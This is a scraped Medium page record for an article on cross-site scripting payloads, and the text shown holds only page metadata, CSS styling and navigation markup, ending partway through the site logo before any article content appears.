{"product_id":"medium","title":"medium","description":"\n\u003ctitle data-rh=\"true\"\u003eCross site scripting (XSS) Payloads | by Pintu Solanki | Medium\u003c\/title\u003e\u003cmeta data-rh=\"true\" charset=\"utf-8\"\u003e\u003cmeta data-rh=\"true\" name=\"viewport\" content=\"width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1\"\u003e\u003cmeta data-rh=\"true\" name=\"theme-color\" content=\"#000000\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:name:iphone\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:id:iphone\" content=\"828256236\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:app_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:app_store_id\" content=\"828256236\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:package\" content=\"com.medium.reader\"\u003e\u003cmeta data-rh=\"true\" property=\"fb:app_id\" content=\"542599432471018\"\u003e\u003cmeta data-rh=\"true\" property=\"og:site_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"og:type\" content=\"article\"\u003e\u003cmeta data-rh=\"true\" property=\"article:published_time\" content=\"2021-04-03T06:27:15.659Z\"\u003e\u003cmeta data-rh=\"true\" name=\"title\" content=\"Cross site scripting (XSS) Payloads | by Pintu Solanki | Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"og:title\" content=\"Cross site scripting (XSS) Payloads\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:url\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:url\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:app_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"description\" content=\"How does XSS work?. “Cross site scripting (XSS) Payloads” is published by Pintu Solanki.\"\u003e\u003cmeta data-rh=\"true\" property=\"og:description\" content=\"How does XSS work?\"\u003e\u003cmeta data-rh=\"true\" property=\"og:url\" content=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:web:url\" content=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"article:author\" content=\"https:\/\/androx47.medium.com\"\u003e\u003cmeta data-rh=\"true\" name=\"author\" content=\"Pintu Solanki\"\u003e\u003cmeta data-rh=\"true\" name=\"robots\" content=\"index,noarchive,follow,max-image-preview:large\"\u003e\u003cmeta data-rh=\"true\" name=\"referrer\" content=\"unsafe-url\"\u003e\u003cmeta data-rh=\"true\" property=\"twitter:title\" content=\"Cross site scripting (XSS) Payloads\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:site\" content=\"@Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:url:iphone\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"twitter:description\" content=\"How does XSS work?\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:card\" content=\"summary\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:creator\" content=\"@androx47\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:label1\" content=\"Reading time\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:data1\" content=\"3 min read\"\u003e\u003clink data-rh=\"true\" rel=\"icon\" href=\"https:\/\/miro.medium.com\/v2\/5d8de952517e8160e40ef9841c781cdc14a5db313057fa3c3de41c6f5b494b19\"\u003e\u003clink data-rh=\"true\" rel=\"search\" type=\"application\/opensearchdescription+xml\" title=\"Medium\" href=\"\/osd.xml\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"152x152\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:304:304\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"120x120\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:240:240\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"76x76\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:152:152\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"60x60\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:120:120\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"mask-icon\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:1000:1000\/7*GAOKVe--MXbEJmV9230oOQ.png\" color=\"#171717\"\u003e\u003clink data-rh=\"true\" rel=\"preconnect\" href=\"https:\/\/glyph.medium.com\" crossorigin=\"\"\u003e\u003clink data-rh=\"true\" id=\"glyph_preload_link\" rel=\"preload\" as=\"style\" type=\"text\/css\" href=\"https:\/\/glyph.medium.com\/css\/unbound.css\"\u003e\u003clink data-rh=\"true\" id=\"glyph_link\" rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/glyph.medium.com\/css\/unbound.css\"\u003e\u003clink data-rh=\"true\" rel=\"author\" href=\"https:\/\/androx47.medium.com\"\u003e\u003clink data-rh=\"true\" rel=\"canonical\" href=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003clink data-rh=\"true\" rel=\"alternate\" href=\"android-app:\/\/com.medium.reader\/https\/medium.com\/p\/6a492d795c0\"\u003e\u003cscript data-rh=\"true\" type=\"application\/ld+json\"\u003e{\"@context\":\"http:\\u002F\\u002Fschema.org\",\"@type\":\"NewsArticle\",\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fv2\\u002Fda:true\\u002Fbd978bb536350a710e8efb012513429cabdc4c28700604261aeda246d0f980b7\",\"height\":810,\"width\":1440},\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\",\"dateCreated\":\"2021-04-03T06:27:15.659Z\",\"datePublished\":\"2021-04-03T06:27:15.659Z\",\"dateModified\":\"2022-01-07T04:41:30.475Z\",\"headline\":\"Cross site scripting (XSS) Payloads - Pintu Solanki - Medium\",\"name\":\"Cross site scripting (XSS) Payloads - Pintu Solanki - Medium\",\"description\":\"How does XSS work?. “Cross site scripting (XSS) Payloads” is published by Pintu Solanki.\",\"identifier\":\"6a492d795c0\",\"author\":{\"@type\":\"Person\",\"name\":\"Pintu Solanki\",\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\"},\"creator\":[\"Pintu Solanki\"],\"publisher\":{\"@type\":\"Organization\",\"name\":\"Medium\",\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002F\",\"logo\":{\"@type\":\"ImageObject\",\"width\":272,\"height\":60,\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fv2\\u002Fresize:fit:544\\u002F7*V1_7XP4snlmqrc_0Njontw.png\"}},\"mainEntityOfPage\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\"}\u003c\/script\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"STATIC\"\u003ehtml{box-sizing:border-box;-webkit-text-size-adjust:100%}*, *:before, *:after{box-sizing:inherit}body{margin:0;padding:0;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;color:rgba(0,0,0,0.8);position:relative;min-height:100vh}h1, h2, h3, h4, h5, h6, dl, dd, ol, ul, menu, figure, blockquote, p, pre, form{margin:0}menu, ol, ul{padding:0;list-style:none;list-style-image:none}main{display:block}a{color:inherit;text-decoration:none}a, button, input{-webkit-tap-highlight-color:transparent}img, svg{vertical-align:middle}button{background:transparent;overflow:visible}button, input, optgroup, select, textarea{margin:0}:root{--reach-tabs:1;--reach-menu-button:1}#speechify-root{font-family:Sohne, sans-serif}div[data-popper-reference-hidden=\"true\"]{visibility:hidden;pointer-events:none}.grecaptcha-badge{visibility:hidden}\n\/*XCode style (c) Angel Garcia \u003cangelgarcia.mail@gmail.com\u003e*\/.hljs {background: #fff;color: black;\n}\/* Gray DOCTYPE selectors like WebKit *\/\n.xml .hljs-meta {color: #c0c0c0;\n}.hljs-comment,\n.hljs-quote {color: #007400;\n}.hljs-tag,\n.hljs-attribute,\n.hljs-keyword,\n.hljs-selector-tag,\n.hljs-literal,\n.hljs-name {color: #aa0d91;\n}.hljs-variable,\n.hljs-template-variable {color: #3F6E74;\n}.hljs-code,\n.hljs-string,\n.hljs-meta .hljs-string {color: #c41a16;\n}.hljs-regexp,\n.hljs-link {color: #0E0EFF;\n}.hljs-title,\n.hljs-symbol,\n.hljs-bullet,\n.hljs-number {color: #1c00cf;\n}.hljs-section,\n.hljs-meta {color: #643820;\n}.hljs-title.class_,\n.hljs-class .hljs-title,\n.hljs-type,\n.hljs-built_in,\n.hljs-params {color: #5c2699;\n}.hljs-attr {color: #836C28;\n}.hljs-subst {color: #000;\n}.hljs-formula {background-color: #eee;font-style: italic;\n}.hljs-addition {background-color: #baeeba;\n}.hljs-deletion {background-color: #ffc8bd;\n}.hljs-selector-id,\n.hljs-selector-class {color: #9b703f;\n}.hljs-doctag,\n.hljs-strong {font-weight: bold;\n}.hljs-emphasis {font-style: italic;\n}\n\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"KEYFRAME\"\u003e@-webkit-keyframes k1{0%{opacity:0.8}50%{opacity:0.5}100%{opacity:0.8}}@-moz-keyframes k1{0%{opacity:0.8}50%{opacity:0.5}100%{opacity:0.8}}@keyframes k1{0%{opacity:0.8}50%{opacity:0.5}100%{opacity:0.8}}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\"\u003e.a{font-family:medium-content-sans-serif-font, -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, Oxygen, Ubuntu, Cantarell, \"Open Sans\", \"Helvetica Neue\", sans-serif}.b{font-weight:400}.c{background-color:rgba(255, 255, 255, 1)}.l{display:block}.m{position:sticky}.n{top:0}.o{z-index:500}.p{padding:0 24px}.q{align-items:center}.r{border-bottom:solid 1px #F2F2F2}.y{height:41px}.z{line-height:20px}.ab{display:flex}.ac{height:57px}.ae{flex:1 0 auto}.af{color:inherit}.ag{fill:inherit}.ah{font-size:inherit}.ai{border:inherit}.aj{font-family:inherit}.ak{letter-spacing:inherit}.al{font-weight:inherit}.am{padding:0}.an{margin:0}.ao{cursor:pointer}.ap:disabled{cursor:not-allowed}.aq:disabled{color:#6B6B6B}.ar:disabled{fill:#6B6B6B}.au{width:auto}.av path{fill:#242424}.aw{height:25px}.ax{margin-left:16px}.ay{border:none}.az{border-radius:20px}.ba{width:240px}.bb{background:#F9F9F9}.bc path{fill:#6B6B6B}.be{outline:none}.bf{font-family:sohne, \"Helvetica Neue\", Helvetica, Arial, sans-serif}.bg{font-size:14px}.bh{width:100%}.bi{padding:10px 20px 10px 0}.bj{background-color:transparent}.bk{color:#242424}.bl::placeholder{color:#6B6B6B}.bm{display:inline-block}.bn{margin-left:12px}.bo{margin-right:12px}.bp{border-radius:4px}.bq{margin-left:24px}.br{height:24px}.bx{background-color:#F9F9F9}.by{border-radius:50%}.bz{height:32px}.ca{width:32px}.cb{justify-content:center}.ch{max-width:680px}.ci{min-width:0}.cj{animation:k1 1.2s ease-in-out infinite}.ck{height:100vh}.cl{margin-bottom:16px}.cm{margin-top:48px}.cn{align-items:flex-start}.co{flex-direction:column}.cp{justify-content:space-between}.cq{margin-bottom:24px}.cw{width:80%}.cx{background-color:#F2F2F2}.dd{height:44px}.de{width:44px}.df{margin:auto 0}.dg{margin-bottom:4px}.dh{height:16px}.di{width:120px}.dj{width:80px}.dp{margin-bottom:8px}.dq{width:96%}.dr{width:98%}.ds{width:81%}.dt{margin-left:8px}.du{color:#6B6B6B}.dv{font-size:13px}.dw{height:100%}.ep{color:#FFFFFF}.eq{fill:#FFFFFF}.er{background:#1A8917}.es{border-color:#1A8917}.ew:disabled{cursor:inherit !important}.ex:disabled{opacity:0.3}.ey:disabled:hover{background:#1A8917}.ez:disabled:hover{border-color:#1A8917}.fa{border-radius:99em}.fb{border-width:1px}.fc{border-style:solid}.fd{box-sizing:border-box}.fe{text-decoration:none}.ff{text-align:center}.fi{margin-right:32px}.fj{position:relative}.fk{fill:#6B6B6B}.fn{background:transparent}.fo svg{margin-left:4px}.fp svg{fill:#6B6B6B}.fr{box-shadow:inset 0 0 0 1px rgba(0, 0, 0, 0.05)}.fs{position:absolute}.fz{margin:0 24px}.gd{background:rgba(255, 255, 255, 1)}.ge{border:1px solid #F2F2F2}.gf{box-shadow:0 1px 4px #F2F2F2}.gg{max-height:100vh}.gh{overflow-y:auto}.gi{left:0}.gj{top:calc(100vh + 100px)}.gk{bottom:calc(100vh + 100px)}.gl{width:10px}.gm{pointer-events:none}.gn{word-break:break-word}.go{word-wrap:break-word}.gp:after{display:block}.gq:after{content:\"\"}.gr:after{clear:both}.gs{line-height:1.23}.gt{letter-spacing:0}.gu{font-style:normal}.gv{font-weight:700}.ia{align-items:baseline}.ib{width:48px}.ic{height:48px}.id{border:2px solid rgba(255, 255, 255, 1)}.ie{z-index:0}.if{box-shadow:none}.ig{border:1px solid rgba(0, 0, 0, 0.05)}.ih{margin-bottom:2px}.ii{flex-wrap:nowrap}.ij{font-size:16px}.ik{line-height:24px}.im{margin:0 8px}.in{display:inline}.io{color:#1A8917}.ip{fill:#1A8917}.is{flex:0 0 auto}.iv{flex-wrap:wrap}.iw{padding-left:8px}.ix{padding-right:8px}.jy\u003e *{flex-shrink:0}.jz{overflow-x:scroll}.ka::-webkit-scrollbar{display:none}.kb{scrollbar-width:none}.kc{-ms-overflow-style:none}.kd{width:74px}.ke{flex-direction:row}.kf{z-index:2}.kg{margin-right:4px}.kj{-webkit-user-select:none}.kk{border:0}.kl{fill:rgba(117, 117, 117, 1)}.ko{outline:0}.kp{user-select:none}.kq\u003e svg{pointer-events:none}.kz{cursor:progress}.la{opacity:1}.lb{padding:4px 0}.le{margin-top:0px}.lf{width:16px}.lh{display:inline-flex}.ln{max-width:100%}.lo{padding:8px 2px}.lp svg{color:#6B6B6B}.mg{line-height:1.12}.mh{letter-spacing:-0.022em}.mi{font-weight:600}.nd{margin-bottom:-0.28em}.ne{box-shadow:inset 3px 0 0 0 #242424}.nf{padding-left:23px}.ng{margin-left:-20px}.nh{line-height:1.58}.ni{letter-spacing:-0.004em}.nj{font-style:italic}.nk{font-family:source-serif-pro, Georgia, Cambria, \"Times New Roman\", Times, serif}.of{margin-bottom:-0.46em}.ol{overflow-x:auto}.om{font-family:source-code-pro, Menlo, Monaco, \"Courier New\", Courier, monospace}.on{padding:20px}.oo{border-radius:0}.op{background:#F2F2F2}.oq{line-height:1.18}.or{margin-top:-0.09em}.os{margin-bottom:-0.09em}.ot{white-space:pre-wrap}.ou{min-width:fit-content}.ov{margin-top:0.91em}.ow{text-decoration:underline}.ox{margin-bottom:26px}.oy{margin-top:6px}.oz{margin-top:8px}.pa{margin-right:8px}.pb{padding:8px 16px}.pc{border-radius:100px}.pd{transition:background 300ms ease}.pf{white-space:nowrap}.pg{border-top:none}.pm{height:52px}.pn{max-height:52px}.po{box-sizing:content-box}.pp{position:static}.pq{z-index:1}.ps{max-width:155px}.py{margin-right:20px}.qe{align-items:flex-end}.qf{width:76px}.qg{height:76px}.qh{border:2px solid #F9F9F9}.qi{height:72px}.qj{width:72px}.qk{stroke:#F2F2F2}.ql{height:36px}.qm{width:36px}.qn{color:#F2F2F2}.qo{fill:#F2F2F2}.qp{border-color:#F2F2F2}.qv{font-weight:500}.qw{font-size:24px}.qx{line-height:30px}.qy{letter-spacing:-0.016em}.qz{margin-top:16px}.ra{height:0px}.rb{border-bottom:solid 1px #E5E5E5}.rh{margin-top:72px}.ri{padding:24px 0}.rj{margin-bottom:0px}.rk{margin-right:16px}.as:hover:not(:disabled){color:rgba(25, 25, 25, 1)}.at:hover:not(:disabled){fill:rgba(25, 25, 25, 1)}.et:hover{background:#156D12}.eu:hover{border-color:#156D12}.ev:hover{cursor:pointer}.fl:hover{color:#242424}.fm:hover{fill:#242424}.fq:hover svg{fill:#242424}.ft:hover{background-color:rgba(0, 0, 0, 0.1)}.il:hover{text-decoration:underline}.iq:hover:not(:disabled){color:#156D12}.ir:hover:not(:disabled){fill:#156D12}.kn:hover{fill:rgba(8, 8, 8, 1)}.lc:hover{fill:#000000}.ld:hover p{color:#000000}.lg:hover{color:#000000}.lq:hover svg{color:#000000}.pe:hover{background-color:#F2F2F2}.qq:hover{background:#F2F2F2}.qr:hover{border-color:#F2F2F2}.qs:hover{cursor:wait}.qt:hover{color:#F2F2F2}.qu:hover{fill:#F2F2F2}.bd:focus-within path{fill:#242424}.km:focus{fill:rgba(8, 8, 8, 1)}.lr:focus svg{color:#000000}.kr:active{border-style:none}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (min-width: 1080px)\"\u003e.d{display:none}.bw{width:64px}.cg{margin:0 64px}.cv{height:48px}.dc{margin-bottom:52px}.do{margin-bottom:48px}.ef{font-size:14px}.eg{line-height:20px}.em{font-size:13px}.eo{padding:5px 12px}.fh{display:flex}.fy{margin-bottom:68px}.gc{max-width:680px}.hq{font-size:42px}.hr{margin-top:1.19em}.hs{margin-bottom:32px}.ht{line-height:52px}.hu{letter-spacing:-0.011em}.hz{align-items:center}.jk{border-top:solid 1px #F2F2F2}.jl{border-bottom:solid 1px #F2F2F2}.jm{margin:32px 0 0}.jn{padding:3px 8px}.jw\u003e *{margin-right:24px}.jx\u003e :last-child{margin-right:0}.ky{margin-top:0px}.lm{margin:0}.mz{font-size:24px}.na{margin-top:1.95em}.nb{line-height:30px}.nc{letter-spacing:-0.016em}.ob{font-size:20px}.oc{margin-top:2.14em}.od{line-height:32px}.oe{letter-spacing:-0.003em}.ok{margin-top:56px}.pl{margin-bottom:88px}.px{display:inline-block}.qd{padding-top:72px}.rg{margin-top:40px}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (max-width: 1079.98px)\"\u003e.e{display:none}.kx{margin-top:0px}.pw{display:inline-block}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (max-width: 903.98px)\"\u003e.f{display:none}.kw{margin-top:0px}.pv{display:inline-block}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (max-width: 727.98px)\"\u003e.g{display:none}.ku{margin-top:0px}.kv{margin-right:0px}.pu{display:inline-block}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (max-width: 551.98px)\"\u003e.h{display:none}.s{display:flex}.t{justify-content:space-between}.bs{width:24px}.cc{margin:0 24px}.cr{height:40px}.cy{margin-bottom:44px}.dk{margin-bottom:32px}.dx{font-size:13px}.dy{line-height:20px}.eh{padding:0px 8px 1px}.fu{margin-bottom:4px}.gw{font-size:32px}.gx{margin-top:1.01em}.gy{margin-bottom:24px}.gz{line-height:38px}.ha{letter-spacing:-0.014em}.hv{align-items:flex-start}.it{flex-direction:column}.iy{margin:24px -24px 0}.iz{padding:0}.jo\u003e *{margin-right:8px}.jp\u003e :last-child{margin-right:24px}.kh{margin-left:0px}.ks{margin-top:0px}.kt{margin-right:0px}.li{margin:0}.ls{border:1px solid #F2F2F2}.lt{border-radius:99em}.lu{padding:0px 16px 0px 12px}.lv{height:38px}.lw{align-items:center}.ly svg{margin-right:8px}.mj{font-size:20px}.mk{margin-top:1.2em}.ml{line-height:24px}.mm{letter-spacing:0}.nl{font-size:18px}.nm{margin-top:1.56em}.nn{line-height:28px}.no{letter-spacing:-0.003em}.og{margin-top:40px}.ph{margin-bottom:80px}.pt{display:inline-block}.pz{padding-top:48px}.rc{margin-top:32px}.lx:hover{border-color:#E5E5E5}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (min-width: 904px) and (max-width: 1079.98px)\"\u003e.i{display:none}.bv{width:64px}.cf{margin:0 64px}.cu{height:48px}.db{margin-bottom:52px}.dn{margin-bottom:48px}.ed{font-size:14px}.ee{line-height:20px}.ek{font-size:13px}.el{padding:5px 12px}.fg{display:flex}.fx{margin-bottom:68px}.gb{max-width:680px}.hl{font-size:42px}.hm{margin-top:1.19em}.hn{margin-bottom:32px}.ho{line-height:52px}.hp{letter-spacing:-0.011em}.hy{align-items:center}.jg{border-top:solid 1px #F2F2F2}.jh{border-bottom:solid 1px #F2F2F2}.ji{margin:32px 0 0}.jj{padding:3px 8px}.ju\u003e *{margin-right:24px}.jv\u003e :last-child{margin-right:0}.ll{margin:0}.mv{font-size:24px}.mw{margin-top:1.95em}.mx{line-height:30px}.my{letter-spacing:-0.016em}.nx{font-size:20px}.ny{margin-top:2.14em}.nz{line-height:32px}.oa{letter-spacing:-0.003em}.oj{margin-top:56px}.pk{margin-bottom:88px}.qc{padding-top:72px}.rf{margin-top:40px}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (min-width: 728px) and (max-width: 903.98px)\"\u003e.j{display:none}.w{display:flex}.x{justify-content:space-between}.bu{width:64px}.ce{margin:0 48px}.ct{height:48px}.da{margin-bottom:52px}.dm{margin-bottom:48px}.eb{font-size:13px}.ec{line-height:20px}.ej{padding:0px 8px 1px}.fw{margin-bottom:68px}.ga{max-width:680px}.hg{font-size:42px}.hh{margin-top:1.19em}.hi{margin-bottom:32px}.hj{line-height:52px}.hk{letter-spacing:-0.011em}.hx{align-items:center}.jc{border-top:solid 1px #F2F2F2}.jd{border-bottom:solid 1px #F2F2F2}.je{margin:32px 0 0}.jf{padding:3px 8px}.js\u003e *{margin-right:24px}.jt\u003e :last-child{margin-right:0}.lk{margin:0}.mr{font-size:24px}.ms{margin-top:1.95em}.mt{line-height:30px}.mu{letter-spacing:-0.016em}.nt{font-size:20px}.nu{margin-top:2.14em}.nv{line-height:32px}.nw{letter-spacing:-0.003em}.oi{margin-top:56px}.pj{margin-bottom:88px}.qb{padding-top:72px}.re{margin-top:40px}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"all and (min-width: 552px) and (max-width: 727.98px)\"\u003e.k{display:none}.u{display:flex}.v{justify-content:space-between}.bt{width:24px}.cd{margin:0 24px}.cs{height:40px}.cz{margin-bottom:44px}.dl{margin-bottom:32px}.dz{font-size:13px}.ea{line-height:20px}.ei{padding:0px 8px 1px}.fv{margin-bottom:4px}.hb{font-size:32px}.hc{margin-top:1.01em}.hd{margin-bottom:24px}.he{line-height:38px}.hf{letter-spacing:-0.014em}.hw{align-items:flex-start}.iu{flex-direction:column}.ja{margin:24px 0 0}.jb{padding:0}.jq\u003e *{margin-right:8px}.jr\u003e :last-child{margin-right:8px}.ki{margin-left:0px}.lj{margin:0}.lz{border:1px solid #F2F2F2}.ma{border-radius:99em}.mb{padding:0px 16px 0px 12px}.mc{height:38px}.md{align-items:center}.mf svg{margin-right:8px}.mn{font-size:20px}.mo{margin-top:1.2em}.mp{line-height:24px}.mq{letter-spacing:0}.np{font-size:18px}.nq{margin-top:1.56em}.nr{line-height:28px}.ns{letter-spacing:-0.003em}.oh{margin-top:40px}.pi{margin-bottom:80px}.qa{padding-top:48px}.rd{margin-top:32px}.me:hover{border-color:#E5E5E5}\u003c\/style\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"RULE\" media=\"print\"\u003e.pr{display:none}\u003c\/style\u003e\u003cdiv id=\"root\"\u003e\u003cdiv class=\"a b c\"\u003e\n\u003cdiv class=\"d e f g h i j k\"\u003e\u003c\/div\u003e\n\u003cscript\u003edocument.domain = document.domain;\u003c\/script\u003e\u003cdiv class=\"l c\"\u003e\n\u003cdiv class=\"l m n o c\"\u003e\n\u003cdiv class=\"p q r s t u v w x i d y z\"\u003e\n\u003ca class=\"du ag dv bf ak b am an ao ap aq ar as at s u w i d q dw z\" href=\"https:\/\/rsci.app.link\/?%24canonical_url=https%3A%2F%2Fmedium.com%2Fp%2F6a492d795c0\u0026amp;%7Efeature=LoOpenInAppButton\u0026amp;%7Echannel=ShowPostUnderUser\u0026amp;source=---two_column_layout_nav----------------------------------\" rel=\"noopener follow\"\u003eOpen in app\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10\" height=\"10\" fill=\"none\" viewbox=\"0 0 10 10\" class=\"dt\"\u003e\u003cpath fill=\"currentColor\" d=\"M.985 8.485a.375.375 0 1 0 .53.53zM8.75 1.25h.375A.375.375 0 0 0 8.75.875zM8.375 6.5a.375.375 0 1 0 .75 0zM3.5.875a.375.375 0 1 0 0 .75zm-1.985 8.14 7.5-7.5-.53-.53-7.5 7.5zm6.86-7.765V6.5h.75V1.25zM3.5 1.625h5.25v-.75H3.5z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003cdiv class=\"ab q\"\u003e\n\u003cp class=\"bf b dx dy dz ea eb ec ed ee ef eg du\"\u003e\u003cspan\u003e\u003cbutton class=\"bf b dx dy eh dz ea ei eb ec ej ek ee el em eg eo ep eq er es et eu ev ew ex ey ez fa fb fc fd bm fe ff\" data-testid=\"headerSignUpButton\"\u003eSign up\u003c\/button\u003e\u003c\/span\u003e\u003c\/p\u003e\n\u003cdiv class=\"ax l\"\u003e\u003cp class=\"bf b dx dy dz ea eb ec ed ee ef eg du\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerSignInButton\" href=\"https:\/\/medium.com\/m\/signin?operation=login\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;source=post_page---two_column_layout_nav-----------------------global_nav-----------\" rel=\"noopener follow\"\u003eSign in\u003c\/a\u003e\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"p q r ab ac\"\u003e\n\u003cdiv class=\"ab q ae\"\u003e\n\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at ab\" aria-label=\"Homepage\" data-testid=\"headerMediumLogo\" href=\"https:\/\/medium.com\/?source=---two_column_layout_nav----------------------------------\" rel=\"noopener follow\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"719\" height=\"160\" fill=\"none\" viewbox=\"0 0 719 160\" class=\"au av aw\"\u003e\u003cpath fill=\"#242424\" d=\"m174.104 9.734.215-.047V8.02H130.39L89.6 103.89 48.81 8.021H1.472v1.666l.212.047c8.018 1.81 12.09 4.509 12.09 14.242V137.93c0 9.734-4.087 12.433-12.106 14.243l-.212.047v1.671h32.118v-1.665l-.213-.048c-8.018-1.809-12.089-4.509-12.089-14.242V30.586l52.399 123.305h2.972l53.925-126.743V140.75c-.687 7.688-4.721 10.062-11.982 11.701l-.215.05v1.652h55.948v-1.652l-.215-.05c-7.269-1.639-11.4-4.013-12.087-11.701l-.037-116.774h.037c0-9.733 4.071-12.432 12.087-14.242m25.555 75.488c.915-20.474 8.268-35.252 20.606-35.507 3.806.063 6.998 1.312 9.479 3.714 5.272 5.118 7.751 15.812 7.368 31.793zm-.553 5.77h65.573v-.275c-.186-15.656-4.721-27.834-13.466-36.196-7.559-7.227-18.751-11.203-30.507-11.203h-.263c-6.101 0-13.584 1.48-18.909 4.16-6.061 2.807-11.407 7.003-15.855 12.511-7.161 8.874-11.499 20.866-12.554 34.343q-.05.606-.092 1.212a50 50 0 0 0-.065 1.151 85.807 85.807 0 0 0-.094 5.689c.71 30.524 17.198 54.917 46.483 54.917 25.705 0 40.675-18.791 44.407-44.013l-1.886-.664c-6.557 13.556-18.334 21.771-31.738 20.769-18.297-1.369-32.314-19.922-31.042-42.395m139.722 41.359c-2.151 5.101-6.639 7.908-12.653 7.908s-11.513-4.129-15.418-11.63c-4.197-8.053-6.405-19.436-6.405-32.92 0-28.067 8.729-46.22 22.24-46.22 5.657 0 10.111 2.807 12.236 7.704zm43.499 20.008c-8.019-1.897-12.089-4.722-12.089-14.951V1.309l-48.716 14.353v1.757l.299-.024c6.72-.543 11.278.386 13.925 2.83 2.072 1.915 3.082 4.853 3.082 8.987v18.66c-4.803-3.067-10.516-4.56-17.448-4.56-14.059 0-26.909 5.92-36.176 16.672-9.66 11.205-14.767 26.518-14.767 44.278-.003 31.72 15.612 53.039 38.851 53.039 13.595 0 24.533-7.449 29.54-20.013v16.865h43.711v-1.746zM424.1 19.819c0-9.904-7.468-17.374-17.375-17.374-9.859 0-17.573 7.632-17.573 17.374s7.721 17.374 17.573 17.374c9.907 0 17.375-7.47 17.375-17.374m11.499 132.546c-8.019-1.897-12.089-4.722-12.089-14.951h-.035V43.635l-43.714 12.551v1.705l.263.024c9.458.842 12.047 4.1 12.047 15.152v81.086h43.751v-1.746zm112.013 0c-8.018-1.897-12.089-4.722-12.089-14.951V43.635l-41.621 12.137v1.71l.246.026c7.733.813 9.967 4.257 9.967 15.36v59.279c-2.578 5.102-7.415 